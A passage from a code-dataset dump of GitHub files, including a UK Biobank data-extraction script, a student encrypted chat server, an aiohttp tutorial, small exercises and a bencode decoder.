open('%s/%s.phenoslice.csv'%(output_dir, outprefix), 'w')\n for line in infile:\n data = line.rstrip().split('\\t')\n output = [data[0]] + [data[col] for col in cols]\n outfile.write('%s\\n'%(','.join(output)))\n outfile.close()\n\n# ===================================================================================================================================\n# ENUMERATE POSSIBLE CATEGORIES FOR EACH FIELD ID OF TYPE 'CATEGORICAL'\nprint('Enumerating possible categories for each categorical-type column...')\nphenoslices = ['Categorical_multiple.phenoslice.csv', 'Categorical_single.phenoslice.csv']\n\nfor phenoslice in phenoslices:\n outname = '%s.possiblecategories.txt'%phenoslice.split('.')[0]\n categories={}\n with open('%s/%s'%(output_dir, phenoslice), 'r') as infile:\n header = next(infile).rstrip().split(',')[1:]\n for f in header:\n categories[f.split('.')[1]] = set()\n for ln, line in enumerate(infile):\n #print(phenoslice, ln)\n splt, headersubset = [],[]\n for idx, i in enumerate(line.rstrip().split(',')[1:]):\n if i != 'NA':\n splt.append(i.replace('\"',''))\n headersubset.append(header[idx])\n for i,value in enumerate(splt):\n datafield = headersubset[i].split('.')[1]\n categories[datafield].add(value)\n\n outfile = open('%s/%s'%(output_dir, outname), 'w')\n for i in sorted(categories):\n # Don't use spaces. There are some categories that have spaces. Ex, field 5090.\n outfile.write('%s\\t%s\\n'%(i, '\\t'.join(sorted(categories[i]))))\n outfile.close()\n\n# ===================================================================================================================================\n# MAKE CATEGORICAL FEATURE MATRIX\nprint('Building categorical feature matrix...')\n# NOTE: If any data-field has more than 'exclusion_threshold' number of possible categories, exclude it. 
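(exclusion_threshold is set to 50 near the top of this script)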
\n# This will exclude data-fields like ICD9/10 codes and drug usage.\n\nfor categoricaltype in ['multiple', 'single']:\n f = 'Categorical_%s.possiblecategories.txt'%categoricaltype\n\n # Make a feature to index mapping \n features = []\n with open('%s/%s'%(output_dir, f), 'r') as infile:\n for line in infile:\n splt = line.rstrip().split('\\t')\n features+=['%s.%s'%(splt[0], s) for s in splt[1:]+['NA'] if len(splt) < exclusion_threshold]\n\n FieldDotCategoryToIndex = {x:i for i,x in enumerate(features)}\n # Define phenoslice\n phenoslice = '%s/Categorical_%s.phenoslice.csv'%(output_dir, categoricaltype)\n\n # Get number of individuals\n with open(phenoslice, 'r') as infile:\n n_individuals = len([i for i, line in enumerate(infile)])-1 # -1 excludes header\n\n # Initialize matrix\n M = np.zeros((n_individuals, len(features)))\n\n # Populate matrix\n with open(phenoslice, 'r') as infile:\n header = next(infile).rstrip().split(',')\n eids = []\n for rowidx,line in enumerate(infile):\n splt = line.rstrip().split(',')\n eid = splt[0]\n eids.append(eid)\n for h, category in zip(header[1:], splt[1:]):\n datafield = h.split('.')[1]\n # Create string made of current column+value seen at this individual/column\n FieldDotCategory = '%s.%s'%(datafield, category.replace('\"',''))\n if FieldDotCategory in FieldDotCategoryToIndex:\n colidx = FieldDotCategoryToIndex[FieldDotCategory]\n M[rowidx, colidx] = 1\n\n # Output to file\n outname='%s.onehot.csv'%f.split('.')[0]\n with open('%s/%s'%(output_dir, outname), 'w') as outfile:\n header=','.join(['eid']+['c.%s'%f for f in features])\n outfile.write('%s\\n'%header)\n for eid, row in zip(eids, M):\n outfile.write('%s,%s\\n'%(eid,','.join([str(int(r)) for r in row])))\n\n# ===================================================================================================================================\n# MAKE INTEGER AND CONTINUOUS MATRICES\nprint('Building integer and continuous matrices...')\nfor phenoslice in ['%s/Integer.phenoslice.csv'%output_dir,\n '%s/Continuous.phenoslice.csv'%output_dir]:\n\n prefix = os.path.basename(phenoslice).split('.')[0]\n\n with open(phenoslice, 'r') as infile:\n header = next(infile).rstrip().split(',')\n\n # Find all datafields that have more than one instance\n multiple = set()\n for h in header[1:]:\n df, nvisit, instance = h.split('.')[1:]\n if int(instance) > 0:\n multiple.add(df)\n\n # Get idx-list for multiple and single datafields\n single_idxs, multiple_idxs = [], []\n for i,h in enumerate(header[1:], start=1): # skip eid \n df, nvisit, instance = h.split('.')[1:]\n if df in multiple:\n multiple_idxs.append(i)\n else:\n single_idxs.append(i)\n\n # Get number of individuals\n with open(phenoslice, 'r') as infile:\n n_individuals = len([i for i, line in enumerate(infile)])-1 # -1 excludes header\n\n # Write data to files\n f_single = open('%s/%s_single.csv'%(output_dir, prefix), 'w')\n f_multiple = open('%s/%s_multiple.csv'%(output_dir, prefix),'w')\n\n with open(phenoslice, 'r') as infile:\n header = next(infile).rstrip().split(',')\n f_single.write('%s\\n'%(','.join([header[i] for i in [0] + single_idxs])))\n f_multiple.write('%s\\n'%(','.join([header[i] for i in [0] + multiple_idxs])))\n\n for rowidx, line in enumerate(infile):\n data = line.rstrip().split(',')\n eid = data[0]\n\n if phenoslice == '%s/Integer.csv'%output_dir:\n # Did this to account for '-3: Prefer not to answer' type fields. \n # Just set them to NA instead. This has not been tested yet. 
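Note (added): the if-test above compares phenoslice against '%s/Integer.csv' % output_dir, but phenoslice paths end in '.phenoslice.csv', so this NA-handling branch appears unreachable as written.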
\n\n dfs_single = [data[i] if '-' not in data[i] \\\n else 'NA' for i in single_idxs]\n\n dfs_multiple = [data[i] if '-' not in data[i] \\\n else 'NA' for i in multiple_idxs]\n else:\n dfs_single = [data[i] for i in single_idxs]\n dfs_multiple = [data[i] for i in multiple_idxs]\n\n\n f_single.write('%s,%s\\n'%(eid,','.join(dfs_single)))\n f_multiple.write('%s,%s\\n'%(eid,','.join(dfs_multiple)))\n\n # Close files\n f_single.close()\n f_multiple.close()\n\n# ===================================================================================================================================\n# EXTRACT ICD10 CODES\nprint('Merging hesin.txt and hesin_diag.txt tables...')\n\n# eid and ins_index together form a primary key\nhesin = pd.read_csv(hesin, sep='\\t', index_col=[0,1])\n# eid, ins_index and arr_index together form a primary key\nhesin_diag = pd.read_csv(hesin_diag, sep='\\t', index_col=[0,1,2])\n# write a new table, where icd10 diagnoses have dates\ndf = hesin_diag.merge(hesin, how='left', on=['eid','ins_index'])\n# Write merged hesin file to disk\ndf.to_csv('%s/hesin_merged_hesin_diag.tsv'%output_dir, sep='\\t', na_rep='NA')\n\n# In case you want to use ICD10 diagnoses that occur before baseline\nbaseline_visit_fieldID = 'f.53.0.0'\nwith open(input_tab_file, 'r') as infile:\n baseline_visit_col = next(infile).rstrip().split('\\t').index(baseline_visit_fieldID)\n\neids = [] \nbaseline_visit_date = {}\nwith open(input_tab_file, 'r') as infile:\n next(infile)\n for line in infile:\n line = line.rstrip().split('\\t', baseline_visit_col+1)\n eid = int(line[0])\n eids.append(eid)\n date = line[-2]\n baseline_visit_date[eid] = date\n\n# Turn the multindex back into columns\ndf.reset_index(inplace=True) \n\n# Create new column 'baseline_date' in Hesin dataframe\ndf['baseline_visit_date'] = [baseline_visit_date[eid] for eid in df['eid']]\n\n# Only include ICD10 codes that were diagnosed prior to baseline UKB visit. \n# To Include ICD10 codes that were diagnosed at any time, comment lines below\n#df = df[df['admidate'] < df['baseline_visit_date']]\n#df['baseline_date'] = [baseline_visit_date[eid] for eid in df['eid']]\n#df = df[df['admidate'] < df['baseline_date']]\n\n# --------- ICD10 LEVEL 1 --------------\nprint('Building ICD10 level 1 matrix...')\n# Make a list of diagnoses for each individual\ndiagnoses = OrderedDict()\nfor eid in eids:\n diagnoses[eid] = []\nfor row in df.itertuples():\n diagnoses[row.eid].append(row.diag_icd10)\n\ncode2category = OrderedDict()\nwith open (coding_19_file, 'r') as infile:\n for line in infile:\n data = line.rstrip().split('\\t')\n if 'Block' in data[0] or 'block' in data[0]:\n code_range = data[0].split(' ')[1]\n # Have to code these manually, bug on UKB website.\n # Ranges at ICD10 level 1 do not cover all possible codes contained at level 2. \n # So I just manually change\n if code_range == 'M20-M25':\n code_range = 'M20-M36'\n if code_range == 'A80-A89':\n code_range = 'A80-A91'\n if code_range == 'U00-U49':\n code_range = 'U00-U81'\n if code_range == 'U82-U85':\n code_range = 'U82-U89'\n\n letter = code_range[0] # letter in front of digits\n lower, upper = code_range[1:3], code_range[5:7]\n codelist = ['%s%0.2d'%(letter,i) for i in range(int(lower), int(upper)+1)]\n for code in codelist:\n code2category[code] = code_range\n\n# I do this stuff to maintain order of categories from ordered Dict. \nlookup = set()\ncategories = [v for k,v in code2category.items()\\\n if v not in lookup and lookup.add(v) is None]\n\n# Given a category, what is the index? 
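(it maps each level-1 block label, e.g. 'A80-A91', to its column index in the one-hot matrix below)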
\ncategory2index = {cat:i for i, cat in enumerate(categories)}\n\n# output to file\noutfile = open('%s/icd10level1.csv'%output_dir, 'w')\noutfile.write('%s\\n'%','.join(['eid']+categories))\nfor eid in diagnoses:\n codes = [i.replace('\"', '')[:3] for i in diagnoses[eid] if i==i]\n one_hot = [0]*len(categories)\n for code in codes:\n category = code2category[code]\n index = category2index[category]\n one_hot[index] = 1\n outfile.write('%s\\n'%','.join([str(eid)]+[str(o) for o in one_hot]))\noutfile.close()\n\n# --------- ICD10 LEVEL 2 --------------\nprint('Building ICD10 level 2 matrix...')\n# Make a list of diagnoses for each individual\ndiagnoses = OrderedDict()\nfor eid in eids:\n diagnoses[eid] = []\nfor row in df.itertuples():\n diagnoses[row.eid].append(row.diag_icd10)\n\ncategories = []\nwith open(coding_19_file, 'r') as infile:\n for line in infile:\n data = line.rstrip().split('\\t')\n code = data[0]\n if len(code) == 3:\n categories.append(code)\n\n# Given a category, what is the index?\ncategory2index = {cat:i for i, cat in enumerate(categories)}\n\n# output to file\noutfile = open('%s/icd10level2.csv'%output_dir, 'w')\noutfile.write('%s\\n'%','.join(['eid']+categories))\n\nfor e, eid in enumerate(diagnoses):\n #print(e)\n codes = [i.replace('\"', '')[:3] for i in diagnoses[eid] if i==i]\n one_hot = [0]*len(categories)\n for code in codes:\n category = code\n index = category2index[category]\n one_hot[index] = 1\n outfile.write('%s\\n'%','.join([str(eid)]+[str(o) for o in one_hot]))\n\n# ===================================================================================================================================\n# MERGE ALL FEATURES INTO A SINGLE MATRIX\nprint('Merging features into a single file...')\nto_merge = [output_dir+'/%s'%f for f in ['Continuous_single.csv',\n 'Continuous_multiple.csv',\n 'Integer_single.csv',\n 'Integer_multiple.csv',\n 'Categorical_single.onehot.csv',\n 'Categorical_multiple.onehot.csv', \n 'icd10level2.csv',\n 'icd10level1.csv']]\n\noutfile = open(output_dir+'/features_merged.csv', 'w')\n\nfirst_file = to_merge[0]\nother_files = [open(f, 'r') for f in to_merge[1:]]\n\nwith open(first_file, 'r') as infile:\n for line in infile:\n out_line = line.rstrip()\n for f in other_files:\n out_line+=(','+next(f).rstrip().split(',',1)[1])\n outfile.write('%s\\n'%out_line)\n\nfor f in other_files+[outfile]:\n f.close()\n","repo_name":"julyankb/ukb-extract","sub_path":"extract.py","file_name":"extract.py","file_ext":"py","file_size_in_byte":17174,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"3238629403","text":"from django.db.models.query_utils import Q\n\nfrom initat.cluster.backbone.models.user import virtual_desktop_user_setting\nfrom initat.cluster_server.capabilities.virtual_desktop import virtual_desktop_server\nfrom initat.cluster_server.modules import cs_base_class\n\n\nclass reload_virtual_desktop(cs_base_class.icswCSServerCom):\n def _call(self, cur_inst):\n '''\n :param icswCSComInstance cur_inst:\n '''\n vdus_pk = cur_inst.srv_com[\"*vdus\"]\n cur_inst.log(\"updating virtual desktop {}\".format(vdus_pk))\n vdus = virtual_desktop_user_setting.objects.get(Q(pk=vdus_pk))\n\n control = virtual_desktop_server.get_instance_for_vdus(vdus, cur_inst.log)\n control.stop()\n\n if not vdus.to_delete and vdus.is_running:\n # don't delete, just restart\n control.start()\n vdus.update_state(virtual_desktop_user_setting.State.STARTING)\n else:\n # don't start anymore, either disabled or delete\n 
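# update_state presumably persists this lifecycle change on the user-setting model\n            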
vdus.update_state(virtual_desktop_user_setting.State.DISABLED)\n\n if vdus.to_delete:\n cur_inst.log(\"removing virtual desktop {}\".format(vdus_pk))\n vdus.delete()\n","repo_name":"walong365/icsw","sub_path":"initat/cluster_server/modules/virtual_desktop_mod.py","file_name":"virtual_desktop_mod.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"6070284703","text":"#\n# @lc app=leetcode id=482 lang=python3\n#\n# [482] License Key Formatting\n#\n\n# @lc code=start\nclass Solution:\n def licenseKeyFormatting(self, S: str, K: int) -> str:\n ans = []\n k = 0\n for s in reversed(S):\n if s == '-':\n continue\n s = s.upper()\n if k == K:\n ans.append('-')\n k = 0\n k += 1\n ans.append(s)\n return ''.join(ans[::-1])\n\n# @lc code=end\n","repo_name":"mingaki/leetcode","sub_path":"482.license-key-formatting.py","file_name":"482.license-key-formatting.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"17525098353","text":"\"\"\"\r\nServidor.\r\n\r\nServidor de un chat. Es una implementación incompleta:\r\n- Falta manejo de exclusión mutua\r\n- Falta poder desconectar de forma limpia clientes\r\n- Falta poder identificar clientes\r\n\"\"\"\r\n\r\n\r\n\r\nimport threading\r\nimport sys \r\nimport socket\r\nimport os\r\nfrom cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes\r\nfrom cryptography.hazmat.primitives.asymmetric import rsa\r\nfrom cryptography.hazmat.primitives.asymmetric import padding\r\nfrom cryptography.hazmat.primitives import hashes, hmac\r\nfrom cryptography.hazmat.backends import default_backend\r\n\r\nimport mensajes\r\nimport llaves\r\n\r\ndef descifrar_llaves(text, llave_publica_receptor):\r\n deciphertext1 = llave_publica_receptor.decrypt(text,\r\n padding.OAEP(\r\n mgf = padding.MGF1(algorithm = hashes.SHA256()),\r\n algorithm = hashes.SHA256(),\r\n label = None))\r\n return deciphertext1\r\n\r\n\r\ndef descifrar_mensaje(aes, iv, mensaje):\r\n aesCipher = Cipher(algorithms.AES(aes),\r\n modes.CTR(iv),\r\n backend = default_backend)\r\n aesDecryptor = aesCipher.decryptor()\r\n texto = aesDecryptor.update(mensaje)\r\n aesDecryptor.finalize()\r\n return texto\r\n\r\ndef calcular_hmac(binario, mac):\r\n codigo = hmac.HMAC(mac, hashes.SHA256(), backend = default_backend())\r\n codigo.update(binario)\r\n return codigo.finalize()\r\n\r\ndef firmar_llaves(aes, iv, mac, llave_privada):\r\n mensaje = aes + iv + mac\r\n signature = llave_privada.sign(mensaje,\r\n padding.PSS(\r\n mgf=padding.MGF1(hashes.SHA256()),\r\n salt_length=padding.PSS.MAX_LENGTH),\r\n hashes.SHA256())\r\n return signature\r\n\r\n\r\ndef crear_socket_servidor(puerto):\r\n servidor = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n servidor.bind(('', int(puerto))) # hace el bind en cualquier interfaz disponible\r\n return servidor\r\n\r\n\r\ndef broadcast(mensaje, clientes, llave_publica_receptor, llave_privada_propia):\r\n print( 'Mensaje cifrado: ', mensaje )\r\n\r\n llaves_cifradas = mensaje[:256]\r\n mensaje = mensaje[256:]\r\n\r\n firma = mensaje[:256]\r\n mensaje = mensaje[256:]\r\n\r\n mac = mensaje[29:]\r\n\r\n mensaje_cifrado = mensaje[:29]\r\n llaves= descifrar_llaves(llaves_cifradas, llave_publica_receptor)\r\n aes= llaves[:16]\r\n # print(\"llaves: \", llaves)\r\n # print(b\"aes: \",aes)\r\n llaves = llaves[16:]\r\n iv= llaves[:16]\r\n # print(b\"iv: \",iv)\r\n llaves = 
llaves[16:]\r\n mac= llaves\r\n # print(b\"mac: \",mac)\r\n\r\n firmas = firmar_llaves(aes, iv, mac, llave_publica_receptor) # paso 2\r\n print( 'llaves firmadas-------------------------------------------------------------------------')\r\n print (firmas)\r\n print( 'llaves firmadas-------------------------------------------------------------------------')\r\n\r\n\r\n mensaje_descifrado = descifrar_mensaje(aes, iv, mensaje_cifrado) # paso 3\r\n print( 'mensaje-------------------------------------------------------------------------')\r\n print (mensaje_descifrado)\r\n print( 'mensaje-------------------------------------------------------------------------')\r\n codigo_mac = calcular_hmac(llaves_cifradas + firma + mensaje_cifrado, mac) # paso 4\r\n print( 'codigo mac-------------------------------------------------------------------------')\r\n print (codigo_mac)\r\n print( 'codigo mac-------------------------------------------------------------------------')\r\n\r\n return 0\r\n \r\n\r\n\r\n \r\n# Hilo para leer mensajes de clientes\r\ndef atencion(cliente, clientes, llave_publica_receptor, llave_privada_propia):\r\n while True:\r\n mensaje = mensajes.leer_mensaje(cliente)\r\n if mensaje.strip() == b'exit':\r\n cliente.close()\r\n return\r\n broadcast(mensaje, clientes, llave_publica_receptor, llave_privada_propia)\r\n \r\n\r\ndef escuchar(servidor, llave_publica_receptor, llave_privada_propia):\r\n servidor.listen(5) # peticiones de conexion simultaneas\r\n clientes = []\r\n while True:\r\n cliente, _ = servidor.accept() # bloqueante, hasta que llegue una peticion\r\n clientes.append(cliente)\r\n hiloAtencion = threading.Thread(target=atencion, args=\r\n (cliente, clientes, llave_publica_receptor, llave_privada_propia)) # se crea un hilo de atención por cliente\r\n hiloAtencion.start()\r\n\r\n\r\nif __name__ == '__main__':\r\n \r\n servidor = crear_socket_servidor(sys.argv[1])\r\n\r\n llave_publica_path = sys.argv[2] # ruta de archivo en formato PEM\r\n llave_publica_receptor = llaves.recuperar_privada_from_path(llave_publica_path)\r\n llave_privada_propia_path = sys.argv[3]\r\n llave_privada_propia = llaves.recuperar_publica_from_path(llave_privada_propia_path)\r\n\r\n print('Escuchando...')\r\n escuchar(servidor, llave_publica_receptor, llave_privada_propia)\r\n\r\n","repo_name":"RamssesMH/Criptografia-con-python","sub_path":"tema6/servidor.py","file_name":"servidor.py","file_ext":"py","file_size_in_byte":4949,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"32399474867","text":"# !/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n# @Author: Aixiu\r\n# @Time : 2022/10/15 16:21:06\r\n\r\n# 环境安装 pip install aiohttp\r\n# 使用该模块中的 ClientSession\r\nimport aiohttp\r\nimport asyncio\r\nimport time\r\n\r\nstart = time.time()\r\nurls = [\r\n 'http://127.0.0.1:5000/bobo',\r\n 'http://127.0.0.1:5000/jay',\r\n 'http://127.0.0.1:5000/tom',\r\n]\r\n\r\nasync def get_page(url):\r\n print(f'正在下载 {url}')\r\n \r\n # response.get是基于同步的,必须使用基于异步的网络请求模块进行指定 url的请求发送\r\n # response = requests.get(url=url)\r\n \r\n # aiohttp: 基于异步网络请求的模块 请看 07-aiohttp实现多任务异步协程.py\r\n # 利用 aiohttp.ClientSession() 返回一个对象,取名为:session\r\n async with aiohttp.ClientSession() as session:\r\n # 进行 session 对象发送请求\r\n # 所有的 with 前边都需要 async 进行修饰,固定写法\r\n # 请求对象返回一个 response 响应数据对象\r\n \r\n # get(),post():\r\n # 如果要进行UA伪装,需要 headers = {}, get里用parame = {}, post里用data = {},代理proxy = 'http://ip:port' 是字符串,不再是字典\r\n async with await session.get(url=url) as response: # 
get发起请求有网络IO阻塞,耗时阻塞,需挂起,挂起方法:await 关键字\r\n # text()返回的字符串形式的响应数据\r\n # read()返回的二进制形式的响应数据\r\n # json()返回的就是json对象\r\n \r\n # 注意:获取响应数据操作之前一定要使用 await 进行手动挂机,不然会报下边RuntimeWarning\r\n # 在异步网页请求中,只要碰到阻塞或等待的代码,就需要手动挂机\r\n page_text = await response.text() # RuntimeWarning: Enable tracemalloc to get the object allocation traceback\r\n print(page_text)\r\n \r\n \r\n print(f'下载完毕 {url}')\r\n \r\ntasks = [] # 多任务列表\r\n\r\nfor url in urls:\r\n c = get_page(url) # 函数get_page返回一个 async协程对象\r\n task = asyncio.ensure_future(c) # 将 async协程对象封装到任务对象 task 当中\r\n tasks.append(task) # 将任务对象,添加到任务列表中\r\n \r\n# 将任务列表注册到循环事件中\r\nloop = asyncio.get_event_loop()\r\nloop.run_until_complete(asyncio.wait(tasks))\r\n\r\nend = time.time()\r\n\r\nprint(f'总耗时:{end - start}')\r\n\r\n","repo_name":"aixiu/python-spider","sub_path":"路飞-小猿圈/05-高性能异步爬虫/07-aiohttp实现多任务异步协程.py","file_name":"07-aiohttp实现多任务异步协程.py","file_ext":"py","file_size_in_byte":2475,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"73490593753","text":"class Node:\n def __init__(self, value=None, next=None):\n self.value = value\n self.next = next\n\n def __str__(self):\n return str(self.value)\n\ndef print_list(node):\n result = []\n while node is not None:\n result.append(str(node.value))\n node = node.next\n return \" \".join(result)\n\n\nclass Solution:\n \"\"\"Assumtion: node given must be in the middle of the linked list\"\"\"\n\n def get_length(self, head):\n \"\"\"\n :param head:\n :return: length:\n\n >>> head = Node(\"1\", (Node(\"2\", Node(\"mid\", Node(\"3\", Node(\"4\"))))))\n >>> Solution().get_length(head)\n 5\n \"\"\"\n if head is None:\n return\n length = 0\n while head is not None:\n head = head.next\n length += 1\n return length\n\n def remove_mid_node(self, head, node):\n \"\"\"\n :param node:\n :return: None:\n\n >>> head = Node(\"1\", (Node(\"2\", Node(\"mid\", Node(\"3\", Node(\"4\"))))))\n >>> Solution().remove_mid_node(head, head.next.next)\n \"\"\"\n middle = self.get_length(head) // 2\n previous = head\n current = head.next\n\n for _ in range(middle - 1):\n previous = current\n current = current.next\n\n if current == node:\n previous.next = current.next\n current.next = None\n\n if current != node:\n raise ValueError\n\n\nif __name__ == \"__main__\":\n import doctest\n doctest.testmod(verbose=True)","repo_name":"laura-barluzzi/Cracking-the-Coding-Interview","sub_path":"2.LinkedLists/2.3.py","file_name":"2.3.py","file_ext":"py","file_size_in_byte":1502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"35996446127","text":"import numpy as np\nimport pandas as pd\nimport math\n\n\n# 배당금 위험-수익률 데이터 생성\ndef dividend():\n divid = pd.read_csv('dividend_final.csv')\n stock_address = ('stocks_data/')\n\n columns = ['회사명', '수익률', '변동성']\n df = pd.DataFrame(columns=columns)\n\n for idx, row in divid.iterrows():\n try:\n stock = pd.read_csv(stock_address + row['회사명'] + '.csv')\n\n # 1개월 변동성 계산 -> 1년 변동성으로 변환\n danger = 0\n month = stock.tail(30)\n\n daily_profits = []\n daily_cost = stock.tail(31).iloc[0]['Close']\n for month_idx, month_row in month.iterrows():\n # danger += (month_row['High'] - month_row['Low']) / month_row['Close'] * 100\n daily_profits.append(math.log(month_row['Close'] / daily_cost))\n daily_cost = month_row['Close']\n volatility = np.std(daily_profits)\n volatility *= math.sqrt(252) * 100\n\n # 비용\n cost = stock.tail(1).iloc[0]['Close']\n profit = row['유형1 당기']\n rate = int(profit) / cost * 100\n if 
rate > 30:\n return\n\n s = pd.Series([row['회사명'], rate, volatility], index=columns)\n\n # append\n df = df.append(s, ignore_index=True)\n\n except Exception as e:\n # print (e)\n continue\n\n df = df.dropna()\n df_valid = df[df['수익률'] != 0]\n df_valid = df_valid.reset_index()\n df_valid = df_valid.drop(axis=1, columns=['index'])\n # print(df_valid)\n return df_valid\n\n\n'''\n# 채권 데이터 생성\ndef bond():\n columns = ['상품명', '수익률', '만기일', '위험도']\n df = pd.DataFrame(columns = columns)\n data = []\n data.append(['30년물', 1.707, 360, 0])\n data.append(['10년물', 1.608, 120, 0])\n data.append(['5년물', 1.299, 60, 0])\n data.append(['3년물', 0.963, 36, 0])\n data.append(['1년물', 0.695, 12, 0])\n\n for item in data:\n df = df.append(pd.Series(item, index = columns), ignore_index= True)\n\n #print (df)\n return df\n'''\n# main\ndf_dividend = dividend()\n# df_deposit, df_saving = deposit()\n# df_bond = bond()\n\ndf_dividend = df_dividend.reset_index()\n# df_deposit = df_deposit.reset_index()\n# df_saving = df_saving.reset_index()\n# df_bond = df_bond.reset_index()\n\ndf_dividend.rename(columns={'회사명': '상품명', '변동성': '위험도'}, inplace=True)\n# df_deposit.rename(columns = {'금리': '수익률'}, inplace = True)\n# df_saving.rename(columns = {'금리': '수익률'}, inplace = True)\n\ndf_dividend['상품유형'] = '배당금'\n# df_deposit['상품유형'] = '예금'\n# df_saving['상품유형'] = '적금'\n# df_bond['상품유형'] = '국채'\n\ncolumns = ['index', '상품명', '수익률', '위험도', '상품유형']\n\ndf = pd.DataFrame(columns=columns)\ndf = df.append(df_dividend)\n# df = df.append(df_deposit)\n# df = df.append(df_saving)\n# df = df.append(df_bond)\n\ndf.drop(columns=df.columns[5:len(df.columns)], inplace=True)\n\nprint('idx,상품명,y,x')\nfor idx, row in df.iterrows():\n print(str(idx) + ',' + row[\"상품명\"] + \",\" + str(row[\"수익률\"]) + \",\" + str(row[\"위험도\"]))\n print(row)\n # print(type(row))\n\n# print(df)\n# print(df.columns)\n\ndf.to_csv('/home/selab/Desktop/chatbot/node/Capstone/Server/public/data_dividend.csv')\n","repo_name":"okeycsy/20-2-Capstone-Hedge-","sub_path":"배당에 관한 사항/dataset_div.py","file_name":"dataset_div.py","file_ext":"py","file_size_in_byte":3409,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"5"} +{"seq_id":"29781435056","text":"from django.urls import path\nfrom .import views\n\nurlpatterns = [\n path('',views.base,name=\"base\"),\n path('day1',views.day1 ,name='day1'),\n path('day2',views.day2 ,name='day2'),\n path('day3',views.day3 ,name='day3'),\n path('day4',views.day4 ,name='day4'),\n]","repo_name":"ranasalman3838/javascriptpractice","sub_path":"jsapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"28787334896","text":"from ble_device import BleDevice\nfrom mqtt_client import MqttClient\nfrom handler import Handler\n\nmac = \"xx:xx:xx:xx:xx:xx\"\nthing_id = \"1\"\n\nip = \"xxx.xxx.xxx.xxx\"\nport = 1883\nclient_name = \"Client\"\n\n#file_name = \"data.txt\"\nminutes = 0.5\n\nthing = BleDevice(mac, thing_id)\nmqtt = MqttClient(ip, port, client_name)\nhandler = 
Handler()\n\nthing.connect()\nmqtt.connect()\n\nhandler.mqtt_setup(mqtt)\n#handler.open_file(file_name)\n#thing.print_svc_char()\nthing.setup()\nthing.set_handler(handler)\n\nthing.get_data(minutes)\n\nthing.disconnect()\nmqtt.disconnect()\n#handler.close_file()","repo_name":"thanospan/EESTech-Challenge-2018-2019","sub_path":"RPi/get_data.py","file_name":"get_data.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"5"} +{"seq_id":"4143281689","text":"#!/usr/bin/env python3\nimport os\nimport sys\nimport argparse\n\nfrom helpers.results_data import nip_stats\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Summarize results of NIP training')\n parser.add_argument('dirs', nargs='*', default=['./data/models/nip'])\n parser.add_argument('--stats', dest='stats', action='store_true', default=False,\n help='Display summary stats')\n parser.add_argument('--n', dest='n', action='store', default=1, type=int,\n help='Set > 1 to average last N samples')\n\n args = parser.parse_args()\n\n for dirname in args.dirs:\n if os.path.exists(dirname):\n print('\\n# {}'.format(dirname))\n df = nip_stats(dirname, args.n)\n print('\\n', df.to_string())\n\n if args.stats:\n print('\\nPer-pipeline summary:\\n')\n print(df.groupby('pipeline').mean().reset_index().to_string())\n\n else:\n print('Error: directory {} does not exist!'.format(os.path.abspath(dirname)))\n sys.exit(1)\n","repo_name":"pkorus/neural-imaging","sub_path":"summarize_nip.py","file_name":"summarize_nip.py","file_ext":"py","file_size_in_byte":1090,"program_lang":"python","lang":"en","doc_type":"code","stars":151,"dataset":"github-code","pt":"5"} +{"seq_id":"20304793712","text":"# The contents of this file are subject to the BitTorrent Open Source License\n# Version 1.1 (the License). You may not copy or use this file, in either\n# source code or executable form, except in compliance with the License. You\n# may obtain a copy of the License at http://www.bittorrent.com/license/.\n#\n# Software distributed under the License is distributed on an AS IS basis,\n# WITHOUT WARRANTY OF ANY KIND, either express or implied. 
See the License\n# for the specific language governing rights and limitations under the\n# License.\n\n# Written by Petru Paler\n\n\n# SOURCE: https://pypi.python.org/pypi/BitTorrent-bencode\n# Modify file for using on python 3\n\n\nclass BTFailure(Exception):\n pass\n\n\ndef decode_int(x, f):\n f += 1\n newf = x.index('e', f)\n n = int(x[f:newf])\n if x[f] == '-':\n if x[f + 1] == '0':\n raise ValueError\n elif x[f] == '0' and newf != f+1:\n raise ValueError\n return n, newf+1\n\n\ndef decode_string(x, f):\n colon = x.index(':', f)\n n = int(x[f:colon])\n if x[f] == '0' and colon != f+1:\n raise ValueError\n colon += 1\n return x[colon:colon+n], colon+n\n\n\ndef decode_list(x, f):\n r, f = [], f+1\n while x[f] != 'e':\n v, f = decode_func[x[f]](x, f)\n r.append(v)\n return r, f + 1\n\n\ndef decode_dict(x, f):\n r, f = {}, f+1\n while x[f] != 'e':\n k, f = decode_string(x, f)\n r[k], f = decode_func[x[f]](x, f)\n return r, f + 1\n\n\ndecode_func = {\n 'l': decode_list,\n 'd': decode_dict,\n 'i': decode_int,\n '0': decode_string,\n '1': decode_string,\n '2': decode_string,\n '3': decode_string,\n '4': decode_string,\n '5': decode_string,\n '6': decode_string,\n '7': decode_string,\n '8': decode_string,\n '9': decode_string\n}\n\n\ndef bdecode(x):\n try:\n r, l = decode_func[x[0]](x, 0)\n except (IndexError, KeyError, ValueError):\n raise BTFailure(\"not a valid bencoded string\")\n if l != len(x):\n raise BTFailure(\"invalid bencoded value (data after valid prefix)\")\n return r\n\ntry:\n from types import StringType, IntType, LongType, DictType, ListType, TupleType\nexcept:\n StringType = str\n IntType = int\n LongType = int\n DictType = dict\n ListType = list\n TupleType = tuple\n\n\nclass Bencached(object):\n __slots__ = ['bencoded']\n\n def __init__(self, s):\n self.bencoded = s\n\n\ndef encode_bencached(x,r):\n 